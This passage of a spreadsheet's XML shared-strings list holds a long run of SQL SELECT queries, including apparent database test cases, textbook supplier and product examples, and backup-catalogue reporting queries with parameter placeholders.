    <t>SELECT CONSTCOL, BUSINESS FROM VWEN4504 GROUP BY BUSINESS, CONSTCOL HAVING AVG ( COST )  &gt; CONSTCOL AND MAX ( COST )  IN  ( SELECT VC4 FROM VWEN4504 GROUP BY VC4 HAVING COUNT ( * )  &gt; 10 )  ORDER BY BUSINESS</t>
  </si>
  <si>
    <t>SELECT COUNT ( * )  AS NumberOfSuppliers FROM S</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT COUNT ( * )  AS NumberOfSuppliers FROM S GROUP BY  (  ) </t>
  </si>
  <si>
    <t>SELECT COUNT ( * )  FROM TEST</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT COUNT ( * )  FROM VWIPR301 WHERE INTEGER  (  (    (  (    (  (  SMINT*2 ) /2 ) *10 ) /10 ) *99.3 ) /99.3 )  &gt;  ( SELECT   (  (    (  (    (  (   ( COUNT ( DISTINCT NUMERIC83NN*2 ) /2 ) *10 ) /10 )  *99 ) /99 ) /13 ) *13 )  FROM TBIPR302 WHERE CHARNN &lt; 'CHARNN'  ) </t>
  </si>
  <si>
    <t>SELECT COUNT ( * )  FROM VWIPR301 WHERE RECID &gt; '100'</t>
  </si>
  <si>
    <t>SELECT COUNT ( * )  FROM dept</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT INTCOLNN )  FROM TBIPR301 WHERE '0' &lt; RECID</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT INTCOLWDN )  FROM TBIPR302 UNION ALL SELECT COUNT ( DISTINCT INTCOLNN )  FROM VWIPR301 UNION ALL SELECT COUNT ( DISTINCT INTCOLWDN )  FROM TBIPR303</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT V1.DATE1 )  FROM VWIPR301 AS V1 UNION SELECT COUNT ( DISTINCT T1.RECID )  FROM TBIPR303 AS T1 UNION ALL SELECT COUNT ( DISTINCT T2.CHAR1 )  FROM TBIPR301 AS T2 UNION SELECT COUNT ( DISTINCT V2.CHARWDU )  FROM VWIPR301 AS V2 UNION ALL SELECT COUNT ( DISTINCT T3.TIMESTAMP2 )  FROM TBIPR302 AS T3</t>
  </si>
  <si>
    <t>SELECT COUNTRY, MAX ( HIREAGE ) , MIN ( TOTSAL )  FROM VWEN4501 WHERE EMPNUM BETWEEN 3000 AND 5000 GROUP BY COUNTRY HAVING COUNT ( * )  &gt; 4 ORDER BY 2 DESC</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT CURRVAL ( ''posts_id_seq'' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT CURRVAL ( ''users_id_seq'' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT CURRVAL ( ''versions_id_seq'' ) </t>
  </si>
  <si>
    <t>SELECT DATE2, TIMESTAMP2, SORT_FIELD FROM TBKT2101 ORDER BY DATE2, TIMESTAMP2, SORT_FIELD</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT DAY ( '2000-01-01' ) /DAYOFYEAR ( '2000-01-01' )  FROM VWKT0902 WHERE RECID  =  FILENO AND DAYOFWEEK ( DATE1 )  IN  ( SELECT DAYOFWEEK ( DATE1 )  FROM TBKT0901 WHERE RECID  =  CHAR ( 100 )  AND DAYOFMONTH ( TIMESTMP )  &lt;&gt;  ( SELECT DAYOFYEAR ( TIMESTMP )  FROM TBKT0902 WHERE DAYOFWEEK ( DATE2 )  &lt; =  DAYOFYEAR ( DATE2 )  AND RECID  =  CHAR ( '100'  )  )   ) </t>
  </si>
  <si>
    <t>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CASE WHEN DAYOFWEEK ( DATE1 )   =  DAYOFMONTH ( CHAR ( TIMESTMP  )  )   THEN 0 WHEN DAYOFMONTH ( VARCHAR ( DATE1  )  )    =  DAYOFYEAR ( TIMESTMP )  THEN 1 WHEN DAYOFWEEK ( VARCHAR ( DATE1  )  )    =  DAYOFYEAR ( CHAR ( '2000-01-01'  )  )   THEN 2 WHEN DAYOFWEEK ( DATE1 )   =  DAYOFWEEK ( CURRENT DATE )  THEN DAYOFWEEK ( DATE1 )  WHEN DAYOFWEEK ( CHAR ( DATE1  )  )   &lt; DAYOFWEEK ( CHAR ( CURRENT TIMESTAMP  )  )   THEN DAYOFMONTH ( DATE1 )  WHEN DAYOFWEEK ( VARCHAR ( DATE1  )  )   &gt; DAYOFWEEK ( VARCHAR ( CURRENT DATE  )  )   THEN DAYOFYEAR ( DATE1 )  ELSE 999 END &lt; =  356</t>
  </si>
  <si>
    <t xml:space="preserve">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RECID  =  FILENO AND DAYOFWEEK ( DATE1 )  IN  ( SELECT DAYOFWEEK ( DATE1 )  FROM TBKT0901 WHERE RECID  =  CHAR ( 100 )  AND DAYOFMONTH ( VARCHAR ( TIMESTMP  )  )   &lt;&gt;  ( SELECT DAYOFYEAR ( VARCHAR ( TIMESTMP  )  )   FROM TBKT0902 WHERE DAYOFWEEK ( DATE2 )  &lt; =  DAYOFYEAR ( DATE2 )  AND RECID  =  CHAR ( '100'  )  )   ) </t>
  </si>
  <si>
    <t>SELECT DAYOFMONTH ( VARCHAR ( '2000-01-01'  )  )  /DAYOFYEAR ( CHAR ( '2000-01-01'  )  )   FROM VWKT0902 A, TBKT0901 B WHERE A.RECID  =  B.FILENO AND DAYOFMONTH ( CASE WHEN DAYOFWEEK ( A.DATE1 )   =  DAYOFMONTH ( CHAR ( B.TIMESTMP  )  )   THEN '2000-01-01' WHEN DAYOFMONTH ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( B.TIMESTMP )  THEN '2000-01-02' WHEN DAYOFWEEK ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( CHAR ( '2000-01-01'  )  )   THEN '2000-01-03' WHEN DAYOFMONTH ( B.DATE1 )   =  DAYOFMONTH ( CURRENT DATE )  THEN '2000-01-04' WHEN DAYOFMONTH ( CHAR ( B.DATE1  )  )   &lt; DAYOFMONTH ( CHAR ( CURRENT TIMESTAMP  )  )   THEN '2000-01-05' WHEN DAYOFMONTH ( VARCHAR ( A.DATE1  )  )   &gt; DAYOFMONTH ( VARCHAR ( CURRENT DATE  )  )   THEN '2000-01-06' ELSE  ( '2000-01-07' )  END )  &lt; 7 AND DAYOFYEAR ( CASE WHEN DAYOFWEEK ( A.DATE1 )   =  DAYOFMONTH ( CHAR ( B.TIMESTMP  )  )   THEN '2000-01-01' WHEN DAYOFMONTH ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( B.TIMESTMP )  THEN '2000-01-02' WHEN DAYOFWEEK ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( CHAR ( '2000-01-01'  )  )   THEN '2000-01-03' WHEN DAYOFYEAR ( B.DATE1 )   =  DAYOFYEAR ( CURRENT DATE )  THEN '2000-01-04' WHEN DAYOFYEAR ( CHAR ( B.DATE1  )  )   &lt; DAYOFYEAR ( CHAR ( CURRENT TIMESTAMP  )  )   THEN '2000-01-05' WHEN DAYOFYEAR ( VARCHAR ( A.DATE1  )  )   &gt; DAYOFYEAR ( VARCHAR ( CURRENT DATE  )  )   THEN '2000-01-06' ELSE  ( '2000-01-07' )  END )  &lt; 7 AND DAYOFWEEK ( CASE WHEN DAYOFWEEK ( A.DATE1 )   =  DAYOFMONTH ( CHAR ( B.TIMESTMP  )  )   THEN '2000-01-02' WHEN DAYOFMONTH ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( B.TIMESTMP )  THEN '2000-01-03' WHEN DAYOFWEEK ( VARCHAR ( A.DATE1  )  )    =  DAYOFYEAR ( CHAR ( '2000-01-01'  )  )   THEN '2000-01-04' WHEN DAYOFWEEK ( B.DATE1 )   =  DAYOFWEEK ( CURRENT DATE )  THEN '2000-01-05' WHEN DAYOFWEEK ( CHAR ( B.DATE1  )  )   &lt; DAYOFWEEK ( CHAR ( CURRENT TIMESTAMP  )  )   THEN '2000-01-06' WHEN DAYOFWEEK ( VARCHAR ( A.DATE1  )  )   &gt; DAYOFWEEK ( VARCHAR ( CURRENT DATE  )  )   THEN '2000-01-07' ELSE  ( '2000-01-01' )  END )  &lt; 7</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE '$100' &gt; ALL  ( SELECT price FROM Product WHERE manufacturer  =  cname ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE '$100' &gt; ANY  ( SELECT price FROM Product WHERE manufacturer  =  cname ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE Company.cname IN  ( SELECT Product.manufacturer FROM Product WHERE Product.price &lt; '$100' ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE Company.cname NOT IN  ( SELECT Product.manufacturer FROM Product WHERE Product.price &gt; =  '$100' ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE EXISTS  ( SELECT * FROM Product WHERE manufacturer  =  cname and Product.price &lt; '$100' ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company WHERE NOT EXISTS  ( SELECT * FROM Product WHERE Product.manufacturer  =  Company.cname and Product.price &gt; =  '$100' ) ;</t>
  </si>
  <si>
    <t>SELECT DISTINCT Company.country FROM Company, Product WHERE Company.cname  =  Product.manufacturer and Product.price &lt; '$100';</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId as JobId, Client.Name as Client, Path.Path,Filename.Name,StartTime,Level,JobFiles,JobBytes FROM Client,Job,File,Filename,Path WHERE Client.ClientId = Job.ClientId AND JobStatus = 'T' AND Job.JobId = File.JobId AND Path.PathId = File.PathId AND Filename.FilenameId = File.FilenameId AND Filename.Name = '%1' ORDER BY Job.StartTime LIMIT 20</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId as JobId,Client.Name as Client, FileSet.FileSet AS FileSet,Level,StartTime, JobFiles,JobBytes,VolumeName FROM Client,Job,JobMedia,Media,FileSet WHERE Client.Name = '%1' AND Client.ClientId = Job.ClientId AND Job.Type = 'B' AND Job.JobStatus = 'T' AND Job.FileSetId = FileSet.FileSetId AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId ORDER BY Job.StartTime</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId as JobId,Job.Name as Name,Job.StartTime as StartTime, Job.Type as Type,Job.Level as Level,Job.JobFiles as Files, Job.JobBytes as Bytes,Job.JobStatus as Status FROM Media,JobMedia,Job WHERE Media.VolumeName = '%1' AND Media.MediaId = JobMedia.MediaId AND JobMedia.JobId = Job.JobId ORDER by Job.StartTime</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId,Client.Name AS Client,StartTime,JobFiles,JobBytes, JobMedia.StartFile as VolFile,VolumeName FROM Client,Job,JobMedia,Media WHERE Client.Name = '%1' AND Client.ClientId = Job.ClientId AND Level = 'F' AND JobStatus = 'T' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId ORDER BY Job.StartTime DESC LIMIT 20</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId,Client.Name as Client,Level,StartTime,JobFiles,JobBytes,VolumeName FROM Client,Job,JobMedia,Media WHERE Client.Name = '%1' AND Client.ClientId = Job.ClientId AND JobStatus = 'T' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId AND Job.StartTime &gt; =  '%2' ORDER BY Job.StartTime</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId,Job.Name,Job.StartTime,Job.Type, Job.Level,Job.JobFiles,Job.JobBytes,Job.JobStatus FROM JobMedia,Job WHERE JobMedia.JobId = Job.JobId AND JobMedia.MediaId = %1 ORDER by Job.StartTime</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId,StartTime AS JobStartTime,VolumeName,Client.Name AS ClientName FROM Job,File,Path,Filename,Media,JobMedia,Client WHERE File.JobId = Job.JobId AND Path.Path = '%1' AND Filename.Name = '%2' AND Client.Name = '%3' AND Path.PathId = File.PathId AND Filename.FilenameId = File.FilenameId AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId AND Client.ClientId = Job.ClientId ORDER BY Job.StartTime DESC LIMIT 5</t>
  </si>
  <si>
    <t>SELECT DISTINCT Job.JobId,VolumeName FROM Job,JobMedia,Media WHERE Job.JobId = %1 AND Job.JobId = JobMedia.JobId AND JobMedia.MediaId = Media.MediaId</t>
  </si>
  <si>
    <t>SELECT DISTINCT TYPE FROM TEST ORDER BY TYPE LIMIT 3</t>
  </si>
  <si>
    <t>SELECT DISTINCT VolumeName from temp2</t>
  </si>
  <si>
    <t>SELECT DISTINCT X.category,  ( SELECT max ( Y.price )  FROM Product Y WHERE X.category  =  Y.category )  FROM Product X;</t>
  </si>
  <si>
    <t>SELECT DISTINCT X.country,  ( SELECT count ( * )  FROM Company Y, Product Z WHERE Y.cname = Z.manufacturer AND Y.country  =  X.country )  FROM Company X;</t>
  </si>
  <si>
    <t>SELECT DISTINCT a.program, cf.organism_id FROM analysis a, analysisfeature af, feature cf WHERE a.program  =  'cogs' AND a.analysis_id  =  af.analysis_id AND af.feature_id  =  cf.feature_id</t>
  </si>
  <si>
    <t>SELECT DISTINCT a.program, cf.organism_id FROM analysis a, analysisfeature af, feature cf WHERE a.program  =  'jaccard' AND a.analysis_id  =  af.analysis_id AND af.feature_id  =  cf.feature_id</t>
  </si>
  <si>
    <t>SELECT DISTINCT country,  ( SELECT count ( * )  FROM Product WHERE cname = manufacturer )  FROM Company;</t>
  </si>
  <si>
    <t>SELECT DISTINCT x.manufacturer,  ( SELECT count ( * )  FROM Product y WHERE x.manufacturer  =  y.manufacturer AND price &lt; '$200' )  AS total FROM Product x WHERE price &lt; '$200';</t>
  </si>
  <si>
    <t>SELECT EMPNUM FROM VWEN4501 WHERE COUNTRY IN  ( SELECT COUNTRY FROM VWEN4501 V1 WHERE TOTSAL &gt; 8000 AND V1.HIREAGE IN  ( SELECT MAX ( HIREAGE )  FROM VWEN4501 V2 WHERE V2.TOTSAL IS NOT NULL AND EMPNUM &lt; 2000 GROUP BY HIREAGE HAVING COUNT ( * )  IN  ( 2,3  )  )   )  AND EMPNUM BETWEEN 2000 AND 3000 UNION ALL SELECT SERIALNO FROM VWEN4502 WHERE SERIALNO BETWEEN 2000 AND 3000 AND EMPLENGTH &lt; ALL  ( SELECT V2.EMPLENGTH FROM VWEN4502 V2 WHERE EMPLENGTH BETWEEN 4000 AND 5000 )  UNION ALL SELECT SERIALNO FROM VWEN4502 WHERE EMPLENGTH *3 &lt;  ( MONTHSAL/100 )  + EMPLENGTH AND EMPLENGTH BETWEEN 3000 AND 4000 ORDER BY 1</t>
  </si>
  <si>
    <t>SELECT EMP_NAME, O.OLD_OFFICE, O.NEW_OFFICE FROM OUTERJN.EMPLOYEES INNER JOIN  ( SELECT OLD_OFFICE, NEW_OFFICE, VALUE  ( OUTERJN.OLD_OFFICES.EMP_ID, OUTERJN.NEW_OFFICES.EMP_ID )  AS E_ID FROM OUTERJN.NEW_OFFICES LEFT JOIN OUTERJN.OLD_OFFICES ON OUTERJN.OLD_OFFICES.EMP_ID  =  OUTERJN.NEW_OFFICES.EMP_ID )  AS O ON OUTERJN.EMPLOYEES.EMP_ID  =  O.E_ID</t>
  </si>
  <si>
    <t>SELECT EMP_NAME, O.OLD_OFFICE, O.NEW_OFFICE FROM OUTERJN.EMPLOYEES INNER JOIN  ( SELECT OLD_OFFICE, NEW_OFFICE, VALUE  ( OUTERJN.OLD_OFFICES.EMP_ID, OUTERJN.NEW_OFFICES.EMP_ID )  AS E_ID FROM OUTERJN.OLD_OFFICES RIGHT JOIN OUTERJN.NEW_OFFICES ON OUTERJN.OLD_OFFICES.EMP_ID  =  OUTERJN.NEW_OFFICES.EMP_ID )  AS O ON OUTERJN.EMPLOYEES.EMP_ID  =  O.E_ID</t>
  </si>
  <si>
    <t>SELECT EMP_NAME, OUTERJN.EMPLOYEES.EMP_ID, NEW_OFFICE FROM OUTERJN.EMPLOYEES LEFT JOIN OUTERJN.NEW_OFFICES ON OUTERJN.EMPLOYEES.EMP_ID  =  OUTERJN.NEW_OFFICES.EMP_ID</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT EMP_NAME, OUTERJN.EMPLOYEES.EMP_ID, NEW_OFFICE FROM OUTERJN.EMPLOYEES, OUTERJN.NEW_OFFICES WHERE OUTERJN.EMPLOYEES.EMP_ID  =  OUTERJN.NEW_OFFICES.EMP_ID UNION ALL SELECT EMP_NAME, EMP.EMP_ID, '?' FROM OUTERJN.EMPLOYEES EMP WHERE EXISTS  ( SELECT * FROM OUTERJN.NEW_OFFICES X WHERE EMP.EMP_ID  =  X.EMP_ID ) </t>
  </si>
  <si>
    <t>SELECT ENO FROM E WHERE BossENO  =  'E1' SELECT E.ENO FROM E JOIN Sub S ON E.BossENO  =  S.ENO SELECT ENO FROM Sub</t>
  </si>
  <si>
    <t>SELECT GR1,COUNT ( * )  FROM USRT027.SORTTAB1 WHERE INT1 &lt; 20092401 GROUP BY GR1 UNION SELECT GR2,COUNT ( * )  FROM USRT027.SORTTAB2 WHERE INT2 &lt; 20092401 GROUP BY GR2 HAVING COUNT ( * )  &gt; 10 UNION SELECT MIN ( GR1 ) ,COUNT ( DISTINCT FLT1 )  FROM USRT027.SORTTAB1 UNION SELECT MAX ( USRT027.SORTTAB1.GR1 ) , MIN ( USRT027.SORTTAB2.INT2 )  FROM USRT027.SORTTAB2,USRT027.SORTTAB1 ORDER BY 1</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT HEX ( A.EMPNO ) , DECIMAL ( A.SRATE ) , INTEGER ( A.EDUC )  FROM USRT029.EMPINT A WHERE A.SRATE &gt;  ( A.EDUC * 2  )  AND A.EMPNO IN  ( SELECT A.EMPNO FROM USRT029.EMPINT A WHERE A.DEPTNO  =  ANY ( SELECT A.DEPTNO FROM USRT029.EMPINT A WHERE A.DEPTNO NOT BETWEEN 'Y10' AND 'Y79'  )  )   UNION ALL  ( SELECT A.EMPLOC, A.JOBCODE, A.EDUC FROM USRT029.EMPINT A WHERE A.SAL  =  004900.00 OR  ( A.EDUC  =  A.SRATE / 2 - 19 )  UNION ALL  ( SELECT HEX ( A.EMPLOC ) , INTEGER ( A.JOBCODE ) , DECIMAL ( A.SAL )  FROM USRT029.EMPINT A WHERE A.DEPTNO  =  'Y55' UNION SELECT HEX ( A.BORN ) , A.EDUC, INTEGER ( A.JOBCODE )  FROM USRT029.EMPINT A WHERE A.SRATE  =   ( SELECT COUNT ( * )  + 6 FROM USRT029.EMPINT A  )  )   ) </t>
  </si>
  <si>
    <t>SELECT IDS.NAME AS INAME, FILES.NAME AS FNAME, COUNT ( * )  AS C FROM TOKENS INNER JOIN IDS ON IDS.EID  =  TOKENS.EID INNER JOIN FILES ON TOKENS.FID  =  FILES.FID GROUP BY IDS.EID, TOKENS.FID ORDER BY C DESC;</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT IFNULL ( FLOAT4WDN,FLOAT4WDN )  FROM VWKT2102 WHERE ABS ( DOUBLE ( FLOAT4NN  )  )    =  DOUBLE ( FLOAT4NN ) </t>
  </si>
  <si>
    <t>SELECT IFNULL ( FLOAT4WDN,FLOAT4WDN )  FROM VWKT2102 WHERE ABS ( FLOAT4WDN )   =  FLOAT4WDN</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT INT ( DECIMAL ( FLOAT ( ABS ( DOUBLE ( CEIL ( FLOOR ( INTCOLNN  )  )    )  )    )  )   )  FROM VWKT2102 WHERE INT ( DECIMAL ( FLOAT ( ABS ( DOUBLE ( CEIL ( FLOOR ( INTCOLNN  )  )    )  )    )  )   )   =  INT ( DECIMAL ( FLOAT ( ABS ( DOUBLE ( CEIL ( FLOOR ( INTCOLNN  )  )    )  )    )  )   ) </t>
  </si>
  <si>
    <t>SELECT Job.Name as JobName, Job.JobId as JobID, VolumeName, Job.StartTime as Start, sum ( JobFiles )  AS Files,sum ( JobBytes )  AS Bytes FROM Job,JobMedia,Media WHERE Job.Name = '%1' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId GROUP by VolumeName, Job.JobID, Job.Name, Job.StartTime ORDER by JobName, Start</t>
  </si>
  <si>
    <t>SELECT Job.Name as JobName, Job.JobId as JobID, VolumeName, Job.StartTime as Start, sum ( JobFiles )  AS Files,sum ( JobBytes )  AS Bytes FROM Job,JobMedia,Media WHERE JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId GROUP by VolumeName, Job.JobID, Job.Name, Job.StartTime ORDER by JobName, Start</t>
  </si>
  <si>
    <t>SELECT MIN ( VALUE ) , MAX ( VALUE )  FROM TEST</t>
  </si>
  <si>
    <t>SELECT MediaId,VolumeName,VolBytes/ ( 1024*1024*1024 )  AS GB,Storage.Name AS Storage,Slot,Pool.Name AS Pool,MediaType,VolStatus FROM Media,Pool,Storage WHERE Media.PoolId = Pool.PoolId AND Slot&gt;0 AND InChanger = 1 AND Media.StorageId = Storage.StorageId ORDER BY MediaType ASC, Slot ASC</t>
  </si>
  <si>
    <t>SELECT OUTERJN.MANYTYPES.*, OUTERJN.MANYTYPES_NOTNULL.* FROM OUTERJN.MANYTYPES LEFT JOIN OUTERJN.MANYTYPES_NOTNULL ON OUTERJN.MANYTYPES.DEC62COL  =  OUTERJN.MANYTYPES_NOTNULL.DEC72COL WHERE OUTERJN.MANYTYPES.INTCOL BETWEEN 5 AND 15 ORDER BY 1</t>
  </si>
  <si>
    <t>SELECT OUTERJN.MANYTYPES.*, OUTERJN.MANYTYPES_NOTNULL.* FROM OUTERJN.MANYTYPES RIGHT JOIN OUTERJN.MANYTYPES_NOTNULL ON OUTERJN.MANYTYPES.DEC62COL  =  OUTERJN.MANYTYPES_NOTNULL.DEC72COL WHERE OUTERJN.MANYTYPES_NOTNULL.INTCOL &gt; 18 ORDER BY 1,11</t>
  </si>
  <si>
    <t>SELECT PART, SUPPLIER, OUTERJN.PARTS.PROD#, PRODUCT FROM OUTERJN.PARTS LEFT OUTER JOIN OUTERJN.PRODUCTS_NOTNULL ON OUTERJN.PARTS.PROD#  =  OUTERJN.PRODUCTS_NOTNULL.PROD# WHERE OUTERJN.PARTS.PROD# &gt; 100</t>
  </si>
  <si>
    <t>SELECT PNO FROM SP WHERE SNO  =  'S1'</t>
  </si>
  <si>
    <t>SELECT PName, Price FROM Product, Company WHERE Manufacturer = CName AND Country = 'Japan' AND Price &lt; =  '$200';</t>
  </si>
  <si>
    <t>SELECT PName, Price, Manufacturer FROM Product WHERE Price &gt; '$100';</t>
  </si>
  <si>
    <t>SELECT POUNDS FROM HIPPO WHERE NULLIF ( CASE WHEN FOOD  =  'FRIED APPLES' THEN '061' WHEN FOOD  =  'PUMPKINS AND ROOTS' THEN '010' WHEN FOOD  =  'LETTUCE AND CARROTS' THEN '118' WHEN FOOD  =  'CABBAGE AND RAISINS' THEN '087' ELSE '999' END, MOUTHS )  BETWEEN '061' AND '087'</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT POUNDS, MOUTHS FROM HIPPO WHERE MOUTHS IN  (  SELECT CASE WHEN MOUTHS  =  '061' THEN '000' WHEN MOUTHS  =  '010' THEN '087' WHEN MOUTHS  =  '118' THEN '118' WHEN MOUTHS  =  '087' THEN '010' WHEN MOUTHS  =  '000' THEN '061' ELSE '999' END FROM HIPPO ) </t>
  </si>
  <si>
    <t>SELECT POUNDS, MOUTHS, CASE WHEN CASE WHEN LEGNO  =  1111 THEN 0 WHEN LEGNO  =  1110 THEN 1 ELSE 2 END  =  0 THEN 9 WHEN CASE LEGNO WHEN 11 THEN 3 WHEN 1011 THEN 4 ELSE 5 END  =  3 THEN 8 ELSE 7 END AS CASERESULT, FOOD FROM HIPPO</t>
  </si>
  <si>
    <t>SELECT POUNDS, NULLIF ( CASE WHEN FOOD  =  'FRIED APPLES' THEN '061' ELSE '999' END, CASE WHEN FOOD  =  'FRIED APPLES' THEN '061' ELSE '999' END )  AS NULLIFRESULT, LEGNO, FOOD FROM HIPPO</t>
  </si>
  <si>
    <t>SELECT Path.Path,Filename.Name FROM File,Filename,Path WHERE File.JobId = %1 AND Filename.FilenameId = File.FilenameId AND Path.PathId = File.PathId ORDER BY Path.Path,Filename.Name</t>
  </si>
  <si>
    <t>SELECT REC_ID, RANK, BENEFIT FROM USER_ADVISOR_RECOMMENDATIONS WHERE TASK_NAME  =  :task_name</t>
  </si>
  <si>
    <t>SELECT Recycle,VolRetention,VolUseDuration,MaxVolJobs,MaxVolFiles,MaxVolBytes FROM Pool WHERE Name = '%1'</t>
  </si>
  <si>
    <t>SELECT SNAME, COALESCE ( SUM ( QTY ) ,0 )  AS Shipping FROM S LEFT JOIN SP ON S.SNO  =  SP.SNO GROUP BY SNAME</t>
  </si>
  <si>
    <t>SELECT SNAME, SUM ( QTY )  AS Shipping FROM S INNER JOIN SP ON S.SNO  =  SP.SNO GROUP BY SNAME</t>
  </si>
  <si>
    <t>SELECT SNAME, SUM ( QTY )  AS Shipping FROM S LEFT JOIN SP ON S.SNO  =  SP.SNO GROUP BY SNAME</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT SNO FROM SP GROUP BY SNO HAVING SUM ( QTY )  &gt;  ( SELECT COALESCE ( SUM ( QTY ) ,0 )  FROM SP WHERE SNO  =  'S5' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT SNO FROM SP GROUP BY SNO HAVING SUM ( QTY )  &gt;  ( SELECT SUM ( QTY )  FROM SP WHERE SNO  =  'S5' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT SNO FROM SP GROUP BY SNO HAVING SUM ( QTY )  &gt;  ( SELECT SUM ( QTY )  FROM SP WHERE SNO  =  @SNO ) </t>
  </si>
  <si>
    <t>SELECT SNO,  ( SELECT COALESCE ( SUM ( QTY ) ,0 )  FROM SP WHERE SNO  =  S.SNO )  +  ( SELECT COALESCE ( SUM ( QTY ) ,0 )  FROM SPJ WHERE SNO  =  S.SNO )  AS Total FROM S</t>
  </si>
  <si>
    <t>SELECT SNO, SUM ( QTY )  AS Shipping FROM SP GROUP BY SNO</t>
  </si>
  <si>
    <t>SELECT SNO, SUM ( QTY )  AS Total FROM  ( SELECT SNO, QTY FROM SP UNION ALL SELECT SNO, QTY FROM SPJ )  AS UnionResult GROUP BY SNO</t>
  </si>
  <si>
    <t>SELECT SNO, SUM ( QTY )  AS Used FROM SPJ GROUP BY SNO</t>
  </si>
  <si>
    <t>SELECT SP.SNO, SUM ( SP.QTY + SPJ.QTY )  AS Total FROM SP INNER JOIN SPJ ON SP.SNO  =  SPJ.SNO GROUP BY SP.SNO</t>
  </si>
  <si>
    <t>SELECT SP.SNO, SUM ( SP.QTY + SPJ.QTY )  AS Total FROM SP, SPJ WHERE SP.SNO  =  SPJ.SNO GROUP BY SP.SNO</t>
  </si>
  <si>
    <t>SELECT SP.SNO, SUM ( SP.QTY + SPJ.QTY )  FROM SP INNER JOIN SPJ ON SP.SNO  =  SPJ.SNO GROUP BY SP.SNO</t>
  </si>
  <si>
    <t>SELECT SP.SNO, SUM ( SP.QTY + SPJ.QTY )  FROM SP, SPJ WHERE SP.SNO  =  SPJ.SNO GROUP BY SP.SNO</t>
  </si>
  <si>
    <t>SELECT SUBSTR ( COUNTRY,1,3 ) , LENGTH ( EMPNO ) , DIGITS ( JOBCODE ) , VALUE ( SRATE,1 )  FROM USRT029.EMPINT WHERE EMPNO &lt; =  '062000' UNION ALL SELECT COUNTRY, EDUC, EMPLOC, SAL FROM USRT029.EMPINT WHERE   (  (  SRATE * EDUC )  - 5  =  190 )  UNION ALL SELECT SUBSTR ( A.SEX,1,1 ) ,A.JOBCODE, SUBSTR ( B.LOCNAME,1,2 ) , VALUE ( A.JOBCODE,1 )  FROM USRT029.EMPINT A, USRT029.EMPLOC B WHERE  ( B.CITY LIKE '%NAGAWA%' AND A.EMPNO  =  '069000' )  UNION ALL SELECT SUBSTR ( COUNTRY,1,5 ) , LENGTH ( EMPNO ) , DIGITS ( JOBCODE ) , VALUE ( SRATE,1 )  FROM USRT029.EMPINT WHERE EMPNO &lt; =  '062000'</t>
  </si>
  <si>
    <t>SELECT SUM ( amount_sold ) , channel_id FROM sales group by channel_id order by channel_id</t>
  </si>
  <si>
    <t>SELECT SUM ( amount_sold ) , promo_id FROM sales where promo_id &lt; 8 group by promo_id order by promo_id</t>
  </si>
  <si>
    <t>SELECT Slot,MaxVolBytes,VolCapacityBytes,VolStatus,Recycle,VolRetention, VolUseDuration,MaxVolJobs,MaxVolFiles FROM Media WHERE VolumeName = '%1'</t>
  </si>
  <si>
    <t>SELECT TBNN1200.old_offices.OLD_OFFICE, TBNN1200.old_offices.EMP_ID FROM  ( TBNN1200.old_offices T1 FULL JOIN TBNN1200.new_offices T2 ON T1.emp_id  =  T2.emp_id ) ,  ( TBNN1200.old_offices T3 FULL JOIN TBNN1200.new_offices T4 ON T3.emp_id  =  T4.emp_id )  WHERE T1.emp_id  =  T3.emp_id</t>
  </si>
  <si>
    <t>SELECT TBNN1201.old_offices.OLD_OFFICE, TBNN1201.old_offices.EMP_ID FROM  ( TBNN1201.old_offices T1 FULL JOIN TBNN1201.new_offices T2 ON T1.emp_id  =  T2.emp_id ) ,  ( TBNN1201.old_offices T3 FULL JOIN TBNN1201.new_offices T4 ON T3.emp_id  =  T4.emp_id )  WHERE T1.emp_id  =  T3.emp_id</t>
  </si>
  <si>
    <t>SELECT TYPE,  ( SELECT VALUE FROM TEST T2 WHERE T.TYPE  =  T2.TYPE ORDER BY TYPE, VALUE LIMIT 1 )  MIN FROM  ( SELECT DISTINCT TYPE FROM TEST )  T ORDER BY TYPE</t>
  </si>
  <si>
